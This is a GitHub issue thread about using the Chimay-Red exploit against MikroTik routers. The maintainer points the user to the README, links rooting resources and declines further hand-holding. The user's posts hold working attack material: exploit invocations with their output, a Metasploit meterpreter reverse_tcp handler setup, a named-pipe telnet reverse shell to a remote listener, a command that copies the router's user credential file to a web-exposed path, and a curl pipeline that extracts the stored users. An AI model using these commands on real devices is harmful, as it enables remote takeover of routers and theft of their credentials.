Chimay-Red icon indicating copy to clipboard operation
Chimay-Red copied to clipboard

Published 20 hours ago verified publisher icon BigNerd95

shellcommand

Open halekan opened this issue 6 years ago • 8 comments

what shellcommand how build it by KALI LINUX to make it works fine /StackClash_mips.py 192.168.1.233 80 binary 192.168.1.89 6785 "nova/bin/info '/system reboot'" Usage: ./StackClash_mips.py IP PORT binary shellcommand

How to get a reverse shell?

  1. First, prepare metasploit multi handler on your computer

use exploit/multi/handler set payload linux/mipsbe/meterpreter/reverse_tcp set LHOST YOUR IP set LPORT YOUR LPORT run

where payload to send it to mikrotik and how build it msfvenom we have only binary ???????

can explain

halekan avatar Mar 06 '18 06:03 halekan

What is this? /StackClash_mips.py 192.168.1.233 80 binary 192.168.1.89 6785 "nova/bin/info '/system reboot'"

Pseudo random command?

Please read the readme.md before opening issues https://github.com/BigNerd95/Chimay-Red/blob/master/README.md#reverse-shell

BigNerd95 avatar Mar 06 '18 10:03 BigNerd95

good

Read it full tes on RB750GL / MIPSBE / v6.37.1

$ nc -l -p 1234

root@test:~/Chimay# ./StackClash_mips.py 192.168.230.113 80 www_binary "/bin/mknod /ram/f p; /bin/telnet 192.168.233.190 1234 < /ram/f | /bin/bash > /ram/f 2>&1"

Crash... Connected Sent Sent Opening 2 sockets Connected Connected Stack clash... Sent Sent Sent Sending payload Sent Starting exploit Done!

root@test:~/Chimay# ./StackClash_mips.py 192.168.233.190 80 www_binary "cp /rw/store/user.dat /ram/winbox.idx"

Crash... Connected Sent Sent Opening 2 sockets Connected Connected Stack clash... Sent Sent Sent Sending payload Sent Starting exploit Done!

Extract users not thing happen

root@test:~/Chimay# curl -s http://192.168.233.190/winbox/index | ./tools/extract_user.py -

root@test:~/Chimay# ............................. it is blank no result no user no password .......................................

halekan avatar Mar 07 '18 04:03 halekan

Does reverse shell work? When you run "extract user" do you close reverse shell before running the exploit?

BigNerd95 avatar Mar 07 '18 05:03 BigNerd95

$ nc -l -p 1234 no

halekan avatar Mar 07 '18 05:03 halekan

So you have to root your board and debug it Sorry but I cant test all versions for anyone If you are able to fix it then send a PR

BigNerd95 avatar Mar 07 '18 05:03 BigNerd95

how root it Give Me Steps one by one

halekan avatar Mar 07 '18 06:03 halekan

Also a coffee?

Some links

https://github.com/0ki/mikrotik-tools/tree/master/exploit-backup

https://www.dropbox.com/s/3fey2nmmu993xz1/Rooting%20Mikro%20Tik%20routers.pdf?dl=0

Then read my pdf to install gdb-server

BigNerd95 avatar Mar 07 '18 06:03 BigNerd95

Nope

BigNerd95 avatar Mar 07 '18 06:03 BigNerd95